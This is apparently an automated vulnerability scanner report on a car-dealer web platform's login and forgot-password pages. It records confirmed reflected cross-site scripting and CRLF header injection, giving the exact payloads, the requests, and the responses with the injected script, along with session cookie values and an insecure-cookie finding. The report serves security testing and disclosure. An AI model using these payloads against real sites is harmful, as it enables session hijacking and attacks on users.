</td> </tr> <tr> <td nowrap><label for="username">Username:</label></td> <td ><input name="username" style="width: 90%" ></td> </tr> <tr> <td nowrap><label for="password">Password:</label></td> <td><input name="password" type="password" style="width: 90%"></td> </tr> <tr> <td colspan="2" align="center" nowrap> <input type="checkbox" name="storeCookie" value="storeCookie"/> <label for="storeCookie">Remember my username and password</label> </td> </tr> <tr> <td colspan="2" align="center"> <input type="submit" value="Login"> </td> </tr> </table> </div> <div id="ie6Upgrade"> <table border="0" cellpadding="0" cellspacing="0"> <tr> <td align="center" style="color: #ff0000;font-weight:bold;"> You are using on old, unsupported version of Internet Explorer.<br/> If you do not upgrade, you will not be able to use the full functionality of ControlCenter.<br/> <a href="http://www.microsoft.com/windows/downloads/ie/getitnow.mspx" target="_blank"> Click Here to Upgrade Now!<br/> <img src="https://cc3.dealer.com/images/box_ie.jpg?1276795935000" border='0' align='middle'> </a> </td> </tr> </table> </div> <div id="ff2Upgrade"> <table border="0" cellpadding="0" cellspacing="0"> <tr> <td align="center" style="color: #ff0000;font-weight:bold;"> You are using on old version of Firefox which we no longer support.<br/> Starting March 1st, 2009, you will no longer be able to login to ControlCenter with this browser.<br/><br/> <a href="http://www.getfirefox.com" target="_blank"> Click Here to Upgrade Now!<br/> <img src="https://cc2.dealer.com/images/getFireFox2.gif?1276795935000" border='0' align='middle'> </a> </td> </tr> </table> </div> </td> </tr></table></form><script src="https://cc1.dealer.com/js/ddc/veneer/util/ext-browser-info-min.js?1302618944000" language="javascript"></script><script src="https://cc3.dealer.com/js/ddc/veneer/ext-login-validation-min.js?1302618944000" language="javascript"></script><style type="text/css" media="screen"> #browserDetectionTable{ visibility: hidden; } #loggedInTable{ position: absolute; top: 0; left: 0; visibility: hidden; }</style><table id="browserDetectionTable" width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td align="center" valign="top"> <br/><br/><br/><br/><br/><br/><br/> We have minimum browser requirements to use our application.<br/><br/> We require Firefox 3.0 & above on Windows or Macintosh.<br/> or Internet Explorer version 7.0 on Windows.<br/>  Please click one of these options download:<br/><br/> <table width="70%"> <tr> <td align="center" class="clickable" style="color: #fd6400;" valign="middle" onclick="location='http://www.mozilla.com/firefox'"> Click to download Firefox 3.0<br/> <img src="https://cc2.dealer.com/images/getFireFox2.gif?1276795935000" border='0' align='middle'><br/> Click to download Firefox 3.0 </td> <td align="center" class="clickable" valign="middle" style="color: #000099;" onclick="location='http://www.microsoft.com/windows/ie/downloads/default.mspx'"> Click to download IE 7.0<br/> <img src="https://cc3.dealer.com/images/box_ie.jpg?1276795935000" border='0' align='middle'><br/> Click to download IE 7.0 </td> </tr> </table> </td> </tr></table><table id="loggedInTable" border="0" width="100%" height="70%"> <tr> <td align="center" valign="center" style="font-family: arial; font-weight: bold"> <span style="color: #880000"> If you have a pop-up blocker installed, it could prevent the login window from appearing.<br/> Please remember to turn off your pop-up blocker for all dealer.com sites. Thank you. </span><br/><br/> <img src="https://cc1.dealer.com/images/3/logo.png?0" border='0' height=150><br/> (You are now logged in and may close this window) </td> </tr></table><script type="text/javascript" language="javascript">BrowserInfo.isDev = ("false" == "true");BrowserInfo.embeddedBrowser = ("" == "true");BrowserInfo.isInternal = ("false" == "true");// since this page gets loaded before the main framework, localized strings for JS need to be included this wayLoginValidator.localizedStrings = { "800_X_600_WARNING" : "Your screen resolution is set to 800 x 600.\nAlthough you can use Control Center at this lower resolution, it functions best at a higher resolution, like 1024 x 768."};LoginValidator.validate("","","3","en_US");</script> <script src="https://ssl.google-analytics.com/ga.js" type="text/javascript"></script> <script type="text/javascript">try{var tracker=_gat._getTracker("UA-248438-3");tracker._initData();tracker._trackPageview()}catch(e){}</script></body> <script language="javascript"> //we need to check for a module hash and preserve that //as well as any query string params //for deep linking into modules var hash = document.location.hash; //we need to reset the form's action //so we include the hash and query params //using get and set Attribute bc there is a form field //named action inside the form....grrrr! var oldAction = document.forms[0].attributes["action"].value; document.forms[0].attributes["action"].value = oldAction + hash; var hasSubmitted = false; if( opener && opener.location.href.indexOf("/views/login") == -1 ){ opener.location = "/views/login?reseller=3&lang=en_US" + (hash); window.close(); } if( window != top ) top.location = location.href; function doPageLoad(){ if( BrowserInfo.isIE() && BrowserInfo.version < 7.0){ //document.getElementById("ie6Upgrade").style.visibility = "visible"; document.getElementById("ie6Upgrade").style.display = "block"; } if( BrowserInfo.isFirefox() && BrowserInfo.version < "3."){ //document.getElementById("ff2Upgrade").style.visibility = "visible"; document.getElementById("ff2Upgrade").style.display = "block"; } if( document.getElementById("loginTable").style.display != "none" ) document.forms[0].username.focus(); } function addBookmark(){ var title = "Control Center Login"; //var url = "http://cc.dealer.com/views/login"; var url = location.href; if( document.all ) window.external.AddFavorite( url, title ); else if( window.sidebar ) window.sidebar.addPanel( title, url, ""); } </script></html>

- /views/login

/views/login CONFIRMED

https://cc.dealer.com/views/login?reseller='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000..

Parameters

Parameter	Type	Value
reseller	GET	'"--></style></script><script>alert(0x000165)</script>

Request

GET /views/login?reseller='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000165)%3C/script%3E HTTP/1.1
Referer: https://cc.dealer.com/views/forgot-password?reseller=&lang=en_US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: cc.dealer.com
Cookie: BIGipServerSecureCC5Pool=2248216074.20736.0000; BIGipServerCC5Pool=3036745226.20480.0000; JSESSIONID=b8pucf8ka74jr; ssoid=612f7905404638d30061b29f5bc6c273
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 3696
Date: Sun, 17 Apr 2011 02:00:01 GMT
Connection: keep-alive

<html><head> <meta http-equiv="Content-type" content="text/html; charset=utf-8" /> <title> Control Center Login</title> <script src="https://cc2.dealer.com/javascript/md5.js?1276795935000" language="javascript"></script> <script language="javascript"> function doLogin() { if(hasSubmitted) return false; theForm = document.forms[0]; var pwEl = theForm.elements["password"]; if( pwEl.value != "" && pwEl.value.length != 32) { pwEl.value=hex_md5(pwEl.value); } // password validation in both ext-user-manager.js (for changing password) and login.vm (for expired passwords) hasSubmitted = true; return true; } function forgotPassword() { var extra = ""; if(document.forms[0].elements["username"].value!="") extra="?_username="+document.forms[0].elements["username"].value+"&reseller='"--></style></script><script>netsparker(0x000165)</script>&lang=en_US"; document.location = "/views/forgot-password"+((extra)?extra:"?reseller='"--></style></script><script>netsparker(0x000165)</script>&lang=en_US"); } </script> <style type="text/css" media="screen"> body{ margin:0; padding:0; overflow: hidden; } html, body{ height:100% } td { font: 12px "Lucida Grande",LucidaGrande,verdana,sans-serif; font-weight: bold; } #loginBox { background: url(https://cc3.dealer.com/images/'"--></style></script><script>netsparker(0x000165)</script>/login_graphic.png?0) no-repeat; width: 489px; height: 330px; } * html #loginBox{ padding-top: 105px; padding-left: 0px; } #loginBox table { padding-left: 50px; padding-right: 65px; } #loginBox table{ padding-top: 105px; } * html #loginBox table { width: 400px; padding-left: 0px; margin-left: 20px; margin-right: 35px; } .instructions{ padding: 2px; padding-left: 18px; font-size: 11px; border: 1px solid #ffff77; font-family: arial; font-weight: bold; background: #ffffcc url( https://cc1.dealer.com/assets/icons/small/information.png?1276796052000 ) no-repeat center left; width: 300px; } a, a:hover, a:click, #devLoginLinks a, #devLoginLinks a:hover, #devLoginLinks a:click{ font-weight: normal; /*color: #ff9900;*/ color: #fd6400; } a, a:visited, #devLoginLinks a:visited{ font-weight: normal; /*color: #ff9900;*/ text-decoration: none; color: #fd6400; } a span, #devLoginLinks a span{ font-weight: normal; /*color: #5983ba;*/ text-decoration: none; color: #000000; } a span, #devLoginLinks a span{ border-bottom: 1px dotted #fd6400; } * html .ieHack{ border-bottom: 1px dotted #fd6400; } #links{ margin-bottom: 10px; margin-right: 10px; } #links td, #links td a, #devLoginLinks a{ font-weight: normal; font-size: 11px; } #ie6Upgrade, #ff2Upgrade{ /*visibility: hidden;*/ display: none; width: 445px; padding-right: 10px; margin-top: 20px; cursor: hand; } #ie6Upgrade td, #ff2Upgrade td{ font-size: 11px; font-weight: normal; } .languageName{ text-transform: capitalize; } .clickable{cursor: pointer;} * html .clickable{cursor: hand;}</style></head><body onLoad="doPageLoad()"><form action="/" method="POST" onSubmit="return doLogin();" id="loginForm"><input type="hidden" name="action" value="Login"><input type="hidden" name="reseller" value="'"--></style></script><script>netsparker(0x000165)</script>"><input type="hidden" name="lang" value=""><table id="loginTable" style="visibility:hidden" width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td align="center"> <table width="450" border="0" cellpadding="5" cellspacing="0" id="links"> <tr> <td align="center"><a href="javascript:addBookmark()" border="0"><span>Bookmark This Page</span></a></td> <td align="center"><a href="javascript:forgotPassword()" border="0"><span>Forgot Username/Password?</span></a></td> </tr> </table> <div id="loginBox"> <table id="loginFormTable" width="100%" cellspacing="4" cellpadding="2" border="0"> <colgroup> <col style="padding-left:5px"> <col width="80%"> </colgroup> <tr> <td colspan="2"> </td> </tr> <tr> <td nowrap><label for="username">Username:</label></td> <td ><input name="username" style="width: 90%" ></td> </tr> <tr> <td nowrap><label for="password">Password:</label></td> <td><input name="password" type="password" style="width: 90%"></td> </tr> <tr> <td colspan="2" align="center" nowrap> <input type="checkbox" name="storeCookie" value="storeCookie"/> <label for="storeCookie">Remember my username and password</label> </td> </tr> <tr> <td colspan="2" align="center"> <input type="submit" value="Login"> </td> </tr> </table> </div> <div id="ie6Upgrade"> <table border="0" cellpadding="0" cellspacing="0"> <tr> <td align="center" style="color: #ff0000;font-weight:bold;"> You are using on old, unsupported version of Internet Explorer.<br/> If you do not upgrade, you will not be able to use the full functionality of ControlCenter.<br/> <a href="http://www.microsoft.com/windows/downloads/ie/getitnow.mspx" target="_blank"> Click Here to Upgrade Now!<br/> <img src="https://cc3.dealer.com/images/box_ie.jpg?1276795935000" border='0' align='middle'> </a> </td> </tr> </table> </div> <div id="ff2Upgrade"> <table border="0" cellpadding="0" cellspacing="0"> <tr> <td align="center" style="color: #ff0000;font-weight:bold;"> You are using on old version of Firefox which we no longer support.<br/> Starting March 1st, 2009, you will no longer be able to login to ControlCenter with this browser.<br/><br/> <a href="http://www.getfirefox.com" target="_blank"> Click Here to Upgrade Now!<br/> <img src="https://cc2.dealer.com/images/getFireFox2.gif?1276795935000" border='0' align='middle'> </a> </td> </tr> </table> </div> </td> </tr></table></form><script src="https://cc1.dealer.com/js/ddc/veneer/util/ext-browser-info-min.js?1302618944000" language="javascript"></script><script src="https://cc3.dealer.com/js/ddc/veneer/ext-login-validation-min.js?1302618944000" language="javascript"></script><style type="text/css" media="screen"> #browserDetectionTable{ visibility: hidden; } #loggedInTable{ position: absolute; top: 0; left: 0; visibility: hidden; }</style><table id="browserDetectionTable" width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td align="center" valign="top"> <br/><br/><br/><br/><br/><br/><br/> We have minimum browser requirements to use our application.<br/><br/> We require Firefox 3.0 & above on Windows or Macintosh.<br/> or Internet Explorer version 7.0 on Windows.<br/>  Please click one of these options download:<br/><br/> <table width="70%"> <tr> <td align="center" class="clickable" style="color: #fd6400;" valign="middle" onclick="location='http://www.mozilla.com/firefox'"> Click to download Firefox 3.0<br/> <img src="https://cc2.dealer.com/images/getFireFox2.gif?1276795935000" border='0' align='middle'><br/> Click to download Firefox 3.0 </td> <td align="center" class="clickable" valign="middle" style="color: #000099;" onclick="location='http://www.microsoft.com/windows/ie/downloads/default.mspx'"> Click to download IE 7.0<br/> <img src="https://cc3.dealer.com/images/box_ie.jpg?1276795935000" border='0' align='middle'><br/> Click to download IE 7.0 </td> </tr> </table> </td> </tr></table><table id="loggedInTable" border="0" width="100%" height="70%"> <tr> <td align="center" valign="center" style="font-family: arial; font-weight: bold"> <span style="color: #880000"> If you have a pop-up blocker installed, it could prevent the login window from appearing.<br/> Please remember to turn off your pop-up blocker for all dealer.com sites. Thank you. </span><br/><br/> <img src="https://cc1.dealer.com/images/'"--></style></script><script>netsparker(0x000165)</script>/logo.png?0" border='0' height=150><br/> (You are now logged in and may close this window) </td> </tr></table><script type="text/javascript" language="javascript">BrowserInfo.isDev = ("false" == "true");BrowserInfo.embeddedBrowser = ("" == "true");BrowserInfo.isInternal = ("false" == "true");// since this page gets loaded before the main framework, localized strings for JS need to be included this wayLoginValidator.localizedStrings = { "800_X_600_WARNING" : "Your screen resolution is set to 800 x 600.\nAlthough you can use Control Center at this lower resolution, it functions best at a higher resolution, like 1024 x 768."};LoginValidator.validate("","","'"--></style></script><script>netsparker(0x000165)</script>","en_US");</script> <script src="https://ssl.google-analytics.com/ga.js" type="text/javascript"></script> <script type="text/javascript">try{var tracker=_gat._getTracker("UA-248438-3");tracker._initData();tracker._trackPageview()}catch(e){}</script></body> <script language="javascript"> //we need to check for a module hash and preserve that //as well as any query string params //for deep linking into modules var hash = document.location.hash; //we need to reset the form's action //so we include the hash and query params //using get and set Attribute bc there is a form field //named action inside the form....grrrr! var oldAction = document.forms[0].attributes["action"].value; document.forms[0].attributes["action"].value = oldAction + hash; var hasSubmitted = false; if( opener && opener.location.href.indexOf("/views/login") == -1 ){ opener.location = "/views/login?reseller='"--></style></script><script>netsparker(0x000165)</script>&lang=en_US" + (hash); window.close(); } if( window != top ) top.location = location.href; function doPageLoad(){ if( BrowserInfo.isIE() && BrowserInfo.version < 7.0){ //document.getElementById("ie6Upgrade").style.visibility = "visible"; document.getElementById("ie6Upgrade").style.display = "block"; } if( BrowserInfo.isFirefox() && BrowserInfo.version < "3."){ //document.getElementById("ff2Upgrade").style.visibility = "visible"; document.getElementById("ff2Upgrade").style.display = "block"; } if( document.getElementById("loginTable").style.display != "none" ) document.forms[0].username.focus(); } function addBookmark(){ var title = "Control Center Login"; //var url = "http://cc.dealer.com/views/login"; var url = location.href; if( document.all ) window.external.AddFavorite( url, title ); else if( window.sidebar ) window.sidebar.addPanel( title, url, ""); } </script></html>

- /views/forgot-password

/views/forgot-password CONFIRMED

https://cc.dealer.com/views/forgot-password?reseller='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ea..

Parameters

Parameter	Type	Value
reseller	GET	'"--></style></script><script>alert(0x000166)</script>
lang	GET	en_US
_state	POST	submit
username	POST	Ronald Smith
email	POST	netsparker@example.com

Request

POST /views/forgot-password?reseller='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000166)%3C/script%3E&lang=en_US HTTP/1.1
Referer: https://cc.dealer.com/views/forgot-password?reseller=&lang=en_US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: cc.dealer.com
Cookie: BIGipServerSecureCC5Pool=2650869258.20736.0000; BIGipServerCC5Pool=3036745226.20480.0000; JSESSIONID=b8pucf8ka74jr; ssoid=612fcb8a40463812016995a20dc568e7
Content-Length: 66
Accept-Encoding: gzip, deflate

_state=submit&username=Ronald+Smith&email=netsparker%40example.com

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 2648
Date: Sun, 17 Apr 2011 02:00:31 GMT
Connection: keep-alive

<html><head> <meta http-equiv="Content-type" content="text/html; charset=utf-8" /> <title>Dealer.com Forgot Username/Password</title><style type="text/css"> body{ margin:0; padding:0; overflow: hidden; } html, body{ height:100% } td { font: 12px "Lucida Grande",LucidaGrande,verdana,sans-serif; font-weight: bold; } #loginBox { background: url(https://cc3.dealer.com/images/'"--></style></script><script>netsparker(0x000166)</script>/login_graphic.png?0) no-repeat; width: 489px; height: 330px; } * html #loginBox{ padding-top: 80px; padding-left: 0px; } #loginBox table { padding-left: 50px; padding-right: 65px; } #loginBox table{ padding-top: 88px; } * html #loginBox table { width: 400px; padding-left: 0px; margin-left: 20px; margin-right: 35px; } .instructions{ padding: 2px; padding-left: 18px; font-size: 11px; border: 1px solid #ffff77; font-family: arial; font-weight: bold; background: #ffffcc url( https://cc1.dealer.com/assets/icons/small/information.png?1276796052000 ) no-repeat center left; width: 85%; } a, a:hover, a:click, #devLoginLinks a, #devLoginLinks a:hover, #devLoginLinks a:click{ font-weight: normal; /*color: #ff9900;*/ color: #fd6400; } a, a:visited, #devLoginLinks a:visited{ font-weight: normal; /*color: #ff9900;*/ text-decoration: none; color: #fd6400; } a span, #devLoginLinks a span{ font-weight: normal; /*color: #5983ba;*/ text-decoration: none; color: #000000; } a span, #devLoginLinks a span{ border-bottom: 1px dotted #fd6400; } * html .ieHack{ border-bottom: 1px dotted #fd6400; } #links{ margin-bottom: 10px; margin-right: 10px; } #links td, #links td a, #devLoginLinks a{ font-weight: normal; font-size: 11px; } #fireFoxDiv{ visibility: hidden; width: 445px; padding-right: 10px; margin-top: 20px; cursor: hand; } #fireFoxDiv td{ font-size: 11px; font-weight: normal; } .clickable{cursor: pointer;} * html .clickable{cursor: hand;} .error, .required{ color: #880000; } .requiredField{ background: #FFFDE6; } .errorField{ /*border: 1px solid #cc0000;*/ background: #FFD8D3; }</style><script type="text/javascript"> function doSubmit() { if(confirm('Your current password will be reset and a new one will be e-mailed to you. Click OK to continue.')) document.forms[0].submit(); } </script></head><body><form method='POST'><input type='hidden' name='_state' value='submit' class='' > <table id="loginTable" width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td align="center"> <table width="450" border="0" cellpadding="0" cellspacing="0" id="links"> <tr> <td align="center"><a href="/views/login?reseller='"--></style></script><script>netsparker(0x000166)</script>" border="0"><span>Return to login</span></a></td> </tr> </table> <div id="loginBox"> <table width="100%" cellspacing="4" cellpadding="2" border="0"> <tr> <td colspan="2"> <div class="instructions"> Forgot your username? Contact Support<br> Forgot your password? Submit the form below </div> </td> </tr> <tr> <td width="10%" nowrap><span class='error'>Username:</span> <span class="required">*</span></td> <td><input type='text' name='username' value='Ronald Smith' class='requiredField' style='width:90%'> <img src='/assets/icons/small/pin_red.png' border=0 align='absbottom' tooltip='Incorrect username or email address, please try again.' class='errorPin'></td> </tr> <tr> <td width="10%" nowrap><span class='error'>Email Address:</span> <span class="required">*</span></td> <td><input type='text' name='email' value='netsparker@example.com' class='requiredField' style='width:90%'> <img src='/assets/icons/small/pin_red.png' border=0 align='absbottom' tooltip='Incorrect username or email address, please try again.' class='errorPin'></td> </tr> <tr> <td colspan="2" align="center"> <input type="button" value='Get New Password' onClick="doSubmit()"> </td> </tr> </table> </div> <div id="fireFoxDiv" onClick=""> </div> </td> </tr> </table></form> <script src="https://cc2.dealer.com/javascript/prototype.js?1276795935000" language="javascript"></script> <script src="https://cc2.dealer.com/javascript/cssQuery/cssQuery-p.js?1276795935000" language="javascript"></script> <script src="https://cc2.dealer.com/components/tooltips/Tooltips.js?1277393950000" language="javascript"></script> <link href="https://cc1.dealer.com/components/tooltips/tooltips.css?1277393950000" rel="stylesheet" type="text/css" media="all" /><script language="javascript"> Error = { showErrorMessage : function( msg ){ if( document.all ) this.hideSelects(); Tooltips.Initialize( null, "img[tooltip]" ); var pageMask = (opener) ? top.document.createElement( "div" ) : document.createElement( "div" ); pageMask.setAttribute( "id", "pageMask" ); if( opener ) top.document.body.appendChild( pageMask ); else document.body.appendChild( pageMask ); pageMask.style.width = (document.all) ? (opener)?top.document.body.scrollWidth:document.body.scrollWidth : (opener)?top.document.body.offsetWidth:document.body.offsetWidth; pageMask.style.height = (document.all)?(opener)?top.document.body.scrollHeight:document.body.scrollHeight:(opener)?(top.document.body.scrollHeight>0)?top.document.body.scrollHeight:top.document.body.offsetHeight:(document.body.scrollHeight>0)?document.body.scrollHeight:document.body.offsetHeight; pageMask.style.visibility = "visible"; var errorDiv = (opener)?top.document.createElement( "div" ):document.createElement( "div" ); errorDiv.setAttribute( "id", "errorMessage" ); if( opener ) top.document.body.appendChild( errorDiv ); else document.body.appendChild( errorDiv ); var errorDivMsg = '<center>\ <img src="/assets/icons/small/stop.png" border=0 align="absmiddle" width="16"> <b>There were errors on this page</b>\  <img src="/assets/icons/small/stop.png" border=0 align="absmiddle" width="16"><br><br>'+ ((msg!="")?msg:"")+'Please resolve all errors and try saving again.<br>\ Mouse over the <img src="/assets/icons/small/pin_red.png" border=0 align="absmiddle" width="16"> icons for more information.</br>\ <span style="color: #454545">(click to close this message)</span>\ </center>'; if( opener ) top.$("errorMessage").innerHTML = errorDivMsg; else $("errorMessage").innerHTML = errorDivMsg; Event.observe( errorDiv, "click", Error.hideErrorMessage.bindAsEventListener(Error) ); if( document.all ){ if( opener ) top.$("errorMessage").style.left = (top.document.body.offsetWidth/2) - (top.$("errorMessage").offsetWidth/2); else $("errorMessage").style.left = (document.body.offsetWidth/2) - ($("errorMessage").offsetWidth/2); }else{ if( opener ) top.$("errorMessage").style.left = (top.innerWidth/2) - (top.$("errorMessage").offsetWidth/2); else $("errorMessage").style.left = (innerWidth/2) - ($("errorMessage").offsetWidth/2); } if( opener ) top.$("errorMessage").style.visibility = "visible"; else $("errorMessage").style.visibility = "visible"; if( opener ) top.StatusControl.changeStatus(null,false,200); else { try { StatusControl.changeStatus(null,false,200); } catch(e) { try { parent.StatusControl.changeStatus(null,false,200); } catch(e){} } } }, hideErrorMessage : function(){ if(document.all){ if( opener ) top.$("pageMask").removeNode(true); else $("pageMask").removeNode(true); }else{ if( opener ) top.$("pageMask").parentNode.removeChild( top.$("pageMask") ); else $("pageMask").parentNode.removeChild( $("pageMask") ); } if( opener ) top.$("errorMessage").style.visibility = "hidden"; else $("errorMessage").style.visibility = "hidden"; if( document.all ) this.showSelects(); }, hideSelects : function(){ var els = document.getElementsByTagName("select"); var ln = els.length; for( var i=ln; i>0; i-- ) els[ln-i].style.visibility = "hidden"; }, showSelects : function(){ var els = document.getElementsByTagName("select"); var ln = els.length; for( var i=ln; i>0; i-- ) els[ln-i].style.visibility = "visible"; } } // TODO: $errorMsg if you want more info in dialog Error.showErrorMessage( "" );</script></body></html>

Cookie Not Marked As Secure

1 TOTAL

IMPORTANT

CONFIRMED

A Cookie was not marked as secure and transmitted over HTTPS. This means the cookie could potentially be stolen by an attacker who can successfully intercept and decrypt the traffic or following a successful MITM (Man in the middle) attack.

Impact

This cookie will be transmitted over a HTTP connection, therefore if this cookie is important (such as a session cookie) an attacker might intercept it and hijack a victim's session. If the attacker can carry out a MITM attack, he/she can force victim to make a HTTP request to steal the cookie.

Actions to Take

See the remedy for solution.
Mark all cookies used within the application as secure. (If the cookie is not related to authentication or does not carry any personal information you do not have to mark it as secure.))

Remedy

Mark all cookies used within the application as secure.

Required Skills for Successful Exploitation

To exploit this issue, the attacker needs to be able to intercept traffic. This generally requires local access to the web server or victim's network. Attackers need to be understand layer 2, have physical access to systems either as way points for the traffic, or locally (have gained access to) to a system between the victim and the web server.

- /views/

/views/ CONFIRMED

https://cc.dealer.com/views/

Identified Cookie

ssoid

Request

GET /views/ HTTP/1.1
Referer: https://cc.dealer.com/views/login?sessionTimedOut=true
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: cc.dealer.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily
Server: Jetty/5.1.1 (Linux/2.6.18-128.7.1.el5 i386 java/1.5.0_16
Location: http://cc.dealer.com/views/login?sessionTimedOut=true
Content-Length: 0
Content-Type: text/plain; charset=UTF-8
Date: Sun, 17 Apr 2011 01:12:25 GMT
Connection: keep-alive
Set-Cookie: ssoid=61040a7440463845001a79eb404a90a2;path=/;domain=.dealer.com,BIGipServerSecureCC5Pool=520162826.20736.0000; path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT

HTTP Header Injection

4 TOTAL

MEDIUM

A CRLF (New line) injection in HTTP headers was identified. This means that the input goes into HTTP headers without proper input filtering.

Impact

Depending on the application. An attacker might carry out the following forms of attacks:

Cross-site Scripting attack which can lead to session hijacking
Session fixation attack by setting a new cookie, which can again lead to session hijacking

Actions to Take

See the remedy for solution.
Ensure the server security patches are up to date and that the current stable version of the software is in use.

Remedy

Do not allow newline characters in input. Where possible use strict white listing.

Required Skills for Successful Exploitation

Crafting the attack to exploit this issue is not a complex process. However most of the unsophisticated attackers will not know that such an attack is possible. Also an attacker needs to reach his victim by an e-mail or other similar method in order to entice them to visit the site or click upon a URL.

External References

- /views/login

/views/login

https://cc.dealer.com/views/login?sessionTimedOut=true&action=Login&lang=http://example.com/%3f%0D%0..

Parameters

Parameter	Type	Value
sessionTimedOut	GET	true
action	GET	Login
lang	GET	http://example.com/? ns: netsparker056650=vuln
password	GET	3
reseller	GET	3
storeCookie	GET	storeCookie

Request

GET /views/login?sessionTimedOut=true&action=Login&lang=http://example.com/%3f%0D%0Ans:%20netsparker056650=vuln&password=3&reseller=3&storeCookie=storeCookie HTTP/1.1
Referer: https://cc.dealer.com/views/login?sessionTimedOut=true
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: cc.dealer.com
Cookie: BIGipServerSecureCC5Pool=2650869258.20736.0000; BIGipServerCC5Pool=3036745226.20480.0000; JSESSIONID=1to63gypndse0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
Location: http://cc.dealer.com/views/login?loginFailed=true&reseller=3&lang=http://example.com/?
ns: netsparker056650=vuln
Content-Length: 0
Content-Type: text/plain; charset=UTF-8
Date: Sun, 17 Apr 2011 01:12:45 GMT
Connection: keep-alive
Set-Cookie: ssoid=61045a9640463812016995a2535254ac;path=/;domain=.dealer.com,ssoid=61045a9640463812016995a2535254ac;path=/;domain=.dealer.com;expires=Thu, 01 Jan 1970 00:00:00 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT

- /views/login

/views/login

https://cc.dealer.com/views/login?sessionTimedOut=true&action=Login&lang=3&password=3&reseller=http:..

Parameters

Parameter	Type	Value
sessionTimedOut	GET	true
action	GET	Login
lang	GET	3
password	GET	3
reseller	GET	http://example.com/? ns: netsparker056650=vuln
storeCookie	GET	storeCookie

Request

GET /views/login?sessionTimedOut=true&action=Login&lang=3&password=3&reseller=http://example.com/%3f%0D%0Ans:%20netsparker056650=vuln&storeCookie=storeCookie HTTP/1.1
Referer: https://cc.dealer.com/views/login?sessionTimedOut=true
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: cc.dealer.com
Cookie: BIGipServerSecureCC5Pool=2248216074.20736.0000; BIGipServerCC5Pool=3036745226.20480.0000; JSESSIONID=b2hdkty4k0kk
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
Location: http://cc.dealer.com/views/login?loginFailed=true&reseller=http://example.com/?
ns: netsparker056650=vuln&lang=3
Content-Length: 0
Content-Type: text/plain; charset=UTF-8
Date: Sun, 17 Apr 2011 01:12:49 GMT
Connection: keep-alive
Set-Cookie: ssoid=6104696b404638d30061b29f0ee5198c;path=/;domain=.dealer.com,ssoid=6104696b404638d30061b29f0ee5198c;path=/;domain=.dealer.com;expires=Thu, 01 Jan 1970 00:00:00 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT

- /views/mshtml.HTMLInputElementClass

/views/mshtml.HTMLInputElementClass

https://cc.dealer.com/views/mshtml.HTMLInputElementClass

Parameters

Parameter	Type	Value
action	POST	Login
reseller	POST	http://example.com/? ns: netsparker056650=vuln
lang	POST	3
username	POST	Ronald Smith
password	POST	3
storeCookie	POST	storeCookie

Request

POST /views/mshtml.HTMLInputElementClass HTTP/1.1
Referer: https://cc.dealer.com/views/login?sessionTimedOut=true
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: cc.dealer.com
Cookie: BIGipServerSecureCC5Pool=2248216074.20736.0000; BIGipServerCC5Pool=3036745226.20480.0000; JSESSIONID=1psr2n1hjmjat; ssoid=6105c41b404638d30061b29f6bba11ad
Content-Length: 141
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

action=Login&reseller=http://example.com/%3f%0D%0Ans:%20netsparker056650=vuln&lang=3&username=Ronald+Smith&password=3&storeCookie=storeCookie

Response

HTTP/1.1 302 Moved Temporarily
Server: Jetty/5.1.1 (Linux/2.6.18-8.el5 i386 java/1.5.0_16
Location: http://cc.dealer.com/views/login?loginFailed=true&reseller=http://example.com/?
ns: netsparker056650vuln&lang=3&reason=INVALID_USERNAME_PASSWORD
Content-Length: 0
Content-Type: text/plain; charset=UTF-8
Date: Sun, 17 Apr 2011 01:14:18 GMT
Connection: keep-alive
Set-Cookie: ssoid=6105c41b404638d30061b29f6bba11ad;path=/;domain=.dealer.com;expires=Thu, 01 Jan 1970 00:00:00 GMT,ssoid=6105c4e8404638bf01d3e3f37391fef2;path=/;domain=.dealer.com
Expires: Thu, 01 Jan 1970 00:00:00 GMT

- /views/mshtml.HTMLInputElementClass

/views/mshtml.HTMLInputElementClass

